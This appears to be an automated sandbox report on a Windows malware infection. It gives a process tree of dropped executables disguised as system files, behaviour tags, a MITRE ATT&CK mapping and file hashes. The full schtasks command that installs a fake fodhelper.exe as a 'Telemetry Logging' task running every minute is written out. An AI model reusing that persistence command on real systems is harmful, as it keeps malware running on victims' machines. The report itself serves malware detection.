                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:2700
                                                                                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2484
                                                                                                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2448
                                                                                                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1888
                                                                                                                                                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                        PID:1436
                                                                                                                                                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1348
                                                                                                                                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1220
                                                                                                                                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1096
                                                                                                                                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                              PID:1056
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                PID:8300
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                PID:6928
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                  PID:8744
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                PID:3944
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\vuiiwdr
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\vuiiwdr
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                PID:7840
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\rsiiwdr
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\rsiiwdr
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                PID:4428
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\rsiiwdr
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\rsiiwdr
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                PID:3840
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                PID:2972
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                  PID:1328
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\vuiiwdr
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\vuiiwdr
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                PID:184
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6520
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\rsiiwdr
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\rsiiwdr
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                  PID:8108
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                  PID:7760
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\vuiiwdr
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\vuiiwdr
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                  PID:4572
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                  PID:3804
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:6908
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                        PID:8672
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msfeedssync.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\msfeedssync.exe sync
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                    PID:7956
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                    PID:200
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                      PID:4312
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:8532
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                      PID:1484
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5848
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                            /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                            PID:1360
                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7056
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:2860
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\rsiiwdr
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\rsiiwdr
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5956
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\shiiwdr
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:2412
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\vuiiwdr
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\vuiiwdr
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:8680
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\hciiwdr
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:6368
                                                                                                                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:356
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                                                                                                    Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    PID:4388
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-JQR6F.tmp\Sun03f5d51697d04.tmp
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-JQR6F.tmp\Sun03f5d51697d04.tmp" /SL5="$A0062,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03f5d51697d04.exe"
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                      PID:3992
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03f5d51697d04.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                        PID:2112
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-O5OG3.tmp\Sun03f5d51697d04.tmp
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-O5OG3.tmp\Sun03f5d51697d04.tmp" /SL5="$301AC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun03f5d51697d04.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                          PID:1328
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-07UQA.tmp\postback.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-07UQA.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:2780
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      PID:2780
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                      PID:8280
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:8360
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                        PID:8464
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                          PID:8524
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5052
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:5248
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:8708
                                                                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                              PID:4628

                                                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                            Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1088

                                                                                                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                            10
                                                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                                                                                                                            Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1088

                                                                                                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                                                                                                            Email Collection

                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                            T1114

                                                                                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\3653666.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              debc850b80586a33278d76f15bbc1ad7

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              2757719e6262195f0f9f2993d23b022dd9f9eceb

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              199199a3ef33f001bd7f564470196abc86b5c1c42bc0c0f643f7a177787d96f8

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              68a369303b9bf2083984d0dad33ce49be9624f75c52c875d1a1168b795644aaae2255c7d084751ff7f48a274ab283da1b7af1db981b5a3f4d705d6e1fc18c995

                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\3653666.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              debc850b80586a33278d76f15bbc1ad7

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              2757719e6262195f0f9f2993d23b022dd9f9eceb

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              199199a3ef33f001bd7f564470196abc86b5c1c42bc0c0f643f7a177787d96f8

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              68a369303b9bf2083984d0dad33ce49be9624f75c52c875d1a1168b795644aaae2255c7d084751ff7f48a274ab283da1b7af1db981b5a3f4d705d6e1fc18c995

                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\8060282.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              eaed44402fd2fb477bcfa8d08b378750

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              00bcba5cd18c0804dbde0a6a6a3ef996ed4e2889

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              39df4d38e5048bdff1e2a489de17f6a6823f13b969da34b50ff072d3b7519aeb

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              aa7f5a1801743364ac392b6dba09dfa157b1217525344fc26f8405da2476846883e98b108270633d7bb2a996b0a8fb38c6521bc6f775ecf635b2de1bbbb6b0cc

                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              ea006ebb562553d2bb1496fc110f4ed3

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              819f05fb09a7873ca789262e5aaf3abf75b67cad

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              67192f6ef03c90873fed0c2e9e5f673336319cc34a8f61d3c066d7af5dfb177b

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              abd0cfb308c157f9bd77364de5ffbdc5c5c501d83d6fff2211b8ca721fa5b863c15de0caaebb4b68442dee439da71ada54e949c83197cd71366b20ceba3bd42a

